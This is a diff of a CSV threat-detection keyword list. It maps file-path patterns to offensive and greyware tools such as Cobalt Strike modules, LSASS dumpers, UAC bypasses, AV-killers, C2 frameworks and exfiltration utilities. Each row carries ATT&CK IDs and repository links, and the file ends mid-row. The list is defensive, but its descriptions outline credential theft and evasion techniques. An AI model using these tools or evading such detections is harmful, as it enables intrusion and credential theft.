+"*\Supernova.exe*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z"
+"*\Supershell.tar.gz*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z"
+"*\Supershell\rssh\pkg\*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. 
By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z"
+"*\Supershell\rssh\pkg\*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z"
+"*\system32.zip*","greyware_tool_keyword","ntdsutil","creating a full backup of the Active Directory database and saving it to the \temp directory","T1003.001 - T1070.004 - T1059","TA0005 - TA0003 - TA0002","N/A","N/A","Credential Access","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*\systemic.txt","offensive_tool_keyword","cobaltstrike","Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - 
Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/BOF-RegSave","1","1","N/A","10","10","171","29","2020-10-08T17:29:02Z","2020-10-07T13:46:03Z"
+"*\TakeMyRDP*","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","3","278","56","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z"
+"*\TASKSHELL.EXE*","offensive_tool_keyword","cobaltstrike","tamper scheduled task with a binary","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/TaskShell","1","0","N/A","10","10","54","8","2021-02-15T19:23:13Z","2021-02-15T19:22:26Z"
+"*\teams_localdb.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a 
post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\teamserver-win.zip*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*\teamstracker.py*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","0","N/A","3","1","47","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z"
+"*\Temp\*\ntds.dit*","greyware_tool_keyword","wmic","The NTDS.dit file is the heart of Active Directory including user accounts If it's found in the Temp directory it could indicate that an attacker has copied the file here in an attempt to extract sensitive information.","T1047 - T1005 - T1567.001","TA0002 - TA0003 - TA0007","N/A","Volt Typhoon","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*\Temp\*\ntds.jfm*","greyware_tool_keyword","wmic","Like the ntds.dit file it should not normally be found in the Temp directory.","T1047 - T1005 - T1567.001","TA0002 - TA0003 - TA0007","N/A","Volt Typhoon","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*\TEMP\AteraUpgradeAgentPackage\*","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 
- T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","N/A","RMM","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*\temp\dump.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*\Temp\dumpert*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. 
while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","0","N/A","N/A","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z"
+"*\temp\hollow.dll*","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","0","N/A","N/A","6","502","97","2023-08-10T00:42:31Z","2021-11-19T15:58:49Z"
+"*\temp\pwned.trx*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*\Temp\Reaper.exe*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z"
+"*\Temp\RTCore64.sys*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z"
+"*\TEMP\ScreenConnect\*.ps1*","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","N/A","RMM","screenconnect.com","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*\Temp\whoami.txt*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\tests\beacon64.bin*","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","0","N/A","10","10","875","158","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z"
+"*\TGSThief\*","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","0","N/A","9","2","129","18","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z"
+"*\the-backdoor-factory\*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z"
+"*\ThemeBleed.exe *","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","143","28","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z"
+"*\ThemeBleed.sln*","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","143","28","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z"
+"*\TheThing.exe*","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). 
Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z"
+"*\TikiCompiler.txt*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z"
+"*\TikiService.exe*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z"
+"*\TikiSpawn.*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. 
writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z"
+"*\tikispawn.xml*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z"
+"*\TikiTorch\Aggressor*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z"
+"*\tir_blanc_holiseum\*.exe*","greyware_tool_keyword","tir_blanc_holiseum","Ransomware simulation","T1486 - T1204 - T1027 - T1059","TA0040 - TA0002 - TA0005","N/A","N/A","Ransomware","https://www.holiseum.com/services/auditer/tir-a-blanc-ransomware","1","0","N/A","4","6","N/A","N/A","N/A","N/A"
+"*\tmp\dll-collection*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z"
+"*\TokenDump.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - 
T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z"
+"*\tokenprivileges.c*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z"
+"*\tokenprivileges.o*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z"
+"*\Tokenvator\*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z"
+"*\Tor\tor.exe*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","0","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z"
+"*\Tor\torrc*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","0","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z"
+"*\TorBrowser*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","0","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z"
+"*\TrustExec.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z"
+"*\uac.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\UACME-*.zip*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*\uberfile.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*\unDefender.exe*","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","0","N/A","10","4","309","78","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" +"*\unquotedsvcpath.o*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" +"*\updog-master\*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. 
It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","0","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" +"*\usbmon.txt*","offensive_tool_keyword","usbmon","USB capture for Linux.","T1052 - T1059 - T1090 - T1105 - T1114 - T1124 - T1497 - T1557","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://www.kernel.org/doc/Documentation/usb/usbmon.txt","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*\Users\*\AppData\Local\GoodSync*","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*\Users\*\AppData\Local\Temp\*.megatools.cache*","greyware_tool_keyword","megatools","Megatools is a collection of free and open source programs for accessing Mega service from a command line. Abused by attackers for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data 